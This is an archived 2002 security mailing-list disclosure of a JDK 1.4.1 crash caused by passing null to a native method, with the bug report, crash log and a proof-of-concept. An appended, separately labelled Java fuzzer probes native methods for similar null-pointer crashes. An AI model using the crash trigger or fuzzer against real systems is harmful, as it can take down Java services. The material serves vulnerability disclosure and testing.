OSEC

 
From: Marc Schoenefeld (marc.schoenefeld_at_uni-muenster.de)
Date: Sat Sep 28 2002 - 03:44:44 CDT


    Hi,

    there are some more possible JVM crashes that can be
    caused by native injection in JDK 1.4.1. Obviously
    Sun still forgot to check for null pointers.

    The threat is the possibility of executing these
    commands. For instance, if you put a null value in
    an API call like
    BufImgSurfaceData.freeNativeICMData(null)
    the freshly released JVM 1.4.1 crashes.
    This behaviour was found on the Win32 and Linux
    JDK distributions. Other distributions might be vulnerable
    too.

    Although the technique for finding these bugs was
    described in my Black Hat talk (USA 2002),
    Sun still delivers new JDK versions with
    these now easily detectable bugs.

    My talk and slides can be downloaded at
    www.illegalaccess.org

    Sincerely
    Marc

    Here is one of the bug reports sent to Sun:

    ----------------- Original Bug Report-------------------

    category : java
    release : 1.4.1
    subcategory : native_interface
    type : bug
    synopsis : JVM-Crash with BufImgSurfaceData
    description : FULL PRODUCT VERSION :
    java version "1.4.1"
    Java(TM) 2 Runtime Environment, Standard Edition (build 1.4.1-b21)
    Java HotSpot(TM) Client VM (build 1.4.1-b21, mixed mode)

    FULL OPERATING SYSTEM VERSION :
    Microsoft Windows 2000 [Version 5.00.2195]

    A DESCRIPTION OF THE PROBLEM :
    Crash with API-Call, found by Nativ3finder

    EXPECTED VERSUS ACTUAL BEHAVIOR :
    Expected: Null Pointer Exception
    Really happened: JVM crash during runtime

    ERROR MESSAGES/STACK TRACES THAT OCCUR :
    Unexpected Signal : EXCEPTION_ACCESS_VIOLATION occurred at PC=0x6D3A5DFB
    Function=[Unknown.]
    Library=c:\java\1.4.1\01\jre\bin\client\jvm.dll
    NOTE: We are unable to locate the function name symbol for the error
          just occurred. Please refer to release documentation for possible
          reason and solutions.

    Current Java thread:
            at sun.awt.image.BufImgSurfaceData.freeNativeICMData(Native Method)
            at Java14CrashBufImgSurfaceData.main(Java14CrashBufImgSurfaceData.java:11)

    Dynamic libraries:
    0x00400000 - 0x00406000 c:\java\1.4.1\01\bin\java.exe
    0x77880000 - 0x77901000 C:\WINNT\System32\ntdll.dll
    0x77DA0000 - 0x77DFC000 C:\WINNT\system32\ADVAPI32.dll
    0x77E70000 - 0x77F32000 C:\WINNT\system32\KERNEL32.DLL
    0x77D30000 - 0x77DA0000 C:\WINNT\system32\RPCRT4.DLL
    0x78000000 - 0x78046000 C:\WINNT\system32\MSVCRT.dll
    0x6D330000 - 0x6D45C000 c:\java\1.4.1\01\jre\bin\client\jvm.dll
    0x77E00000 - 0x77E64000 C:\WINNT\system32\USER32.dll
    0x77F40000 - 0x77F7C000 C:\WINNT\system32\GDI32.DLL
    0x77540000 - 0x77571000 C:\WINNT\System32\WINMM.dll
    0x6D1D0000 - 0x6D1D7000 c:\java\1.4.1\01\jre\bin\hpi.dll
    0x6D300000 - 0x6D30D000 c:\java\1.4.1\01\jre\bin\verify.dll
    0x6D210000 - 0x6D229000 c:\java\1.4.1\01\jre\bin\java.dll
    0x6D320000 - 0x6D32D000 c:\java\1.4.1\01\jre\bin\zip.dll
    0x6D000000 - 0x6D0FA000 C:\java\1.4.1\01\jre\bin\awt.dll
    0x777F0000 - 0x7780D000 C:\WINNT\System32\WINSPOOL.DRV
    0x75DF0000 - 0x75E0A000 C:\WINNT\System32\IMM32.dll
    0x77A40000 - 0x77B36000 C:\WINNT\system32\ole32.dll
    0x6D180000 - 0x6D1D0000 C:\java\1.4.1\01\jre\bin\fontmanager.dll
    0x51000000 - 0x51044000 C:\WINNT\System32\ddraw.dll
    0x72810000 - 0x72816000 C:\WINNT\System32\DCIMAN32.dll
    0x72D90000 - 0x72E03000 C:\WINNT\System32\D3DIM.DLL
    0x6E330000 - 0x6E336000 C:\WINNT\System32\INDICDLL.dll
    0x77910000 - 0x77933000 C:\WINNT\system32\imagehlp.dll
    0x72970000 - 0x7299D000 C:\WINNT\system32\DBGHELP.dll
    0x68F30000 - 0x68F3B000 C:\WINNT\System32\PSAPI.DLL

    Local Time = Tue Sep 24 00:33:34 2002
    Elapsed Time = 1
    #
    # HotSpot Virtual Machine Error : EXCEPTION_ACCESS_VIOLATION
    # Error ID : 4F530E43505002E6
    # Please report this error at
    # http://java.sun.com/cgi-bin/bugreport.cgi
    #
    # Java VM: Java HotSpot(TM) Client VM (1.4.1-b21 mixed mode)
    #
    # An error report file has been saved as hs_err_pid2252.log.
    # Please refer to the file for further information.

    REPRODUCIBILITY :
    This bug can be reproduced always.

    ---------- BEGIN SOURCE ----------
    import sun.awt.image.BufImgSurfaceData;
    import java.awt.*;
    import java.awt.image.*;
    import sun.java2d.*;

    public class Java14CrashBufImgSurfaceData {
        public static void main(String [] args) {
            // Creating a Frame loads the AWT native libraries; without it the
            // next statement fails with "missing native ids" instead of crashing.
            Frame F = new Frame();
            // The null argument reaches the native side unchecked: expected
            // NullPointerException, actual EXCEPTION_ACCESS_VIOLATION in jvm.dll.
            BufImgSurfaceData.freeNativeICMData(null);
        }
    }

    ---------- END SOURCE ----------

    CUSTOMER WORKAROUND :
    Don't use BufImgSurfaceData
    workaround :
    suggested_val :
    cust_name : Marc Schoenefeld
    cust_email : marc_________.de
    jdcid :
    keyword : webbug
    company : Me
    hardware : x86
    OSversion : win_xp
    bugtraqID : 0
    dateCreated : 2002-09-23 16:38:24.0
    dateEvaluated : 2002-09-24 09:56:59.644

    --
    -- Mahatma Gandhi--
    First they ignore you
    Then they laugh at you
    Then they fight you
    Then you win
    -- Mahatma Gandhi--
    

    Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
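The post credits the finding to a tool ("Nativ3finder") and a talk, neither of which is on this page. The following is an added example written for this edition, not Marc Schoenefeld's tool and not Sun's code, showing the general form of the technique the PoC above demonstrates for one method: enumerate the static native methods under a package prefix, call each with null for every reference parameter, and do so in a separate child JVM per method so that a native crash (SIGSEGV, EXCEPTION_ACCESS_VIOLATION) kills only that child and the scan continues. The class name NullNativeProbe, the two sub-commands, and the 10-second per-probe timeout are assumptions of this example. It assumes Java 8 or later (Process.waitFor with a timeout) and a JDK that still ships classes in a jar such as rt.jar; on JDK 9+ the child JVM additionally needs --add-opens for the probed package, and the jar walk would have to be replaced with a module-image walk.

```java
import java.io.File;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.ArrayList;
import java.util.Enumeration;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

/*
 * NullNativeProbe (example code, names assumed): find static native methods
 * under a package prefix and call each one with null / zero arguments inside a
 * child JVM. Exit code 0 means the child caught a Java exception (e.g. the
 * NullPointerException one would expect); any other exit code or a timeout
 * means the VM itself died in native code and left an hs_err_pid*.log behind.
 *
 *   java NullNativeProbe scan   <path-to-rt.jar> sun.awt.image
 *   java NullNativeProbe invoke <class> <method>      (run by scan in a child)
 */
public class NullNativeProbe {

    private static final long PROBE_TIMEOUT_SEC = 10;   // assumed value

    public static void main(String[] args) throws Exception {
        if (args.length == 3 && args[0].equals("scan")) {
            scan(new File(args[1]), args[2]);
        } else if (args.length == 3 && args[0].equals("invoke")) {
            System.exit(invokeWithNulls(args[1], args[2]));
        } else {
            System.err.println("usage: NullNativeProbe scan <jar> <package.prefix>");
            System.err.println("       NullNativeProbe invoke <class> <method>");
        }
    }

    /* Parent side: walk the jar, select static native methods that take at
     * least one reference parameter (those are the ones null can reach), and
     * probe each in its own child JVM. initialize=false keeps <clinit> and any
     * System.loadLibrary out of the parent process. */
    static void scan(File jar, String prefix) throws Exception {
        try (JarFile jf = new JarFile(jar)) {
            for (Enumeration<JarEntry> e = jf.entries(); e.hasMoreElements();) {
                String name = e.nextElement().getName();
                if (!name.endsWith(".class")) continue;
                String cls = name.substring(0, name.length() - 6).replace('/', '.');
                if (!cls.startsWith(prefix)) continue;
                Method[] methods;
                try {
                    methods = Class.forName(cls, false, null).getDeclaredMethods();
                } catch (Throwable t) {      // NoClassDefFoundError, SecurityException, ...
                    continue;
                }
                for (Method m : methods) {
                    int mod = m.getModifiers();
                    if (!Modifier.isNative(mod) || !Modifier.isStatic(mod)) continue;
                    if (!takesReference(m)) continue;
                    System.out.println(probeInChild(cls, m.getName()) + "  " + cls + "." + m.getName());
                }
            }
        }
    }

    static boolean takesReference(Method m) {
        for (Class<?> p : m.getParameterTypes()) if (!p.isPrimitive()) return true;
        return false;
    }

    /* Spawn "java ... NullNativeProbe invoke <cls> <method>" and classify the
     * outcome by exit code. Child output is inherited so the child's own line
     * ("threw java.lang.NullPointerException" or the HotSpot crash banner)
     * appears next to the verdict. */
    static String probeInChild(String cls, String method) throws Exception {
        String java = System.getProperty("java.home") + File.separator + "bin" + File.separator + "java";
        List<String> cmd = new ArrayList<>();
        cmd.add(java);
        cmd.add("-Djava.awt.headless=true");   // lets sun.awt.* initializers load awt natives without a display
        cmd.add("-cp");
        cmd.add(System.getProperty("java.class.path"));
        cmd.add(NullNativeProbe.class.getName());
        cmd.add("invoke");
        cmd.add(cls);
        cmd.add(method);
        Process p = new ProcessBuilder(cmd).inheritIO().start();
        if (!p.waitFor(PROBE_TIMEOUT_SEC, TimeUnit.SECONDS)) {
            p.destroyForcibly();
            return "HANG  ";
        }
        int rc = p.exitValue();
        return rc == 0 ? "ok    " : "CRASH " + rc;
    }

    /* Child side: initialize the class (its static initializer normally loads
     * the native library, which is why the PoC above creates a Frame first),
     * then invoke the method with null for every reference parameter and
     * zero/false for every primitive. Any Java exception is the benign outcome
     * and maps to exit code 0; a native crash never returns from invoke(). */
    static int invokeWithNulls(String cls, String method) {
        try {
            Class<?> c = Class.forName(cls, true, null);
            for (Method m : c.getDeclaredMethods()) {
                if (!m.getName().equals(method) || !Modifier.isNative(m.getModifiers())) continue;
                m.setAccessible(true);
                Class<?>[] types = m.getParameterTypes();
                Object[] args = new Object[types.length];
                for (int i = 0; i < types.length; i++) args[i] = defaultValue(types[i]);
                m.invoke(null, args);
                System.out.println("returned normally");
                return 0;
            }
            System.out.println("no such static native method");
            return 0;
        } catch (Throwable t) {   // InvocationTargetException wraps the callee's exception
            System.out.println("threw " + (t.getCause() != null ? t.getCause() : t));
            return 0;
        }
    }

    static Object defaultValue(Class<?> t) {
        if (!t.isPrimitive()) return null;
        if (t == boolean.class) return Boolean.FALSE;
        if (t == char.class) return (char) 0;
        if (t == byte.class) return (byte) 0;
        if (t == short.class) return (short) 0;
        if (t == int.class) return 0;
        if (t == long.class) return 0L;
        if (t == float.class) return 0f;
        return 0d;
    }
}
```

Running the scan with the prefix sun.awt.image against a JDK of the 1.4.1 vintage would report a CRASH line for BufImgSurfaceData.freeNativeICMData, the case in the post; a JDK that validates its arguments reports "ok" with "threw java.lang.NullPointerException" beside it. Only static natives are probed here because instance natives would additionally need a constructed receiver; extending the example to instances means choosing a constructor per class, which is where a real fuzzer spends most of its effort.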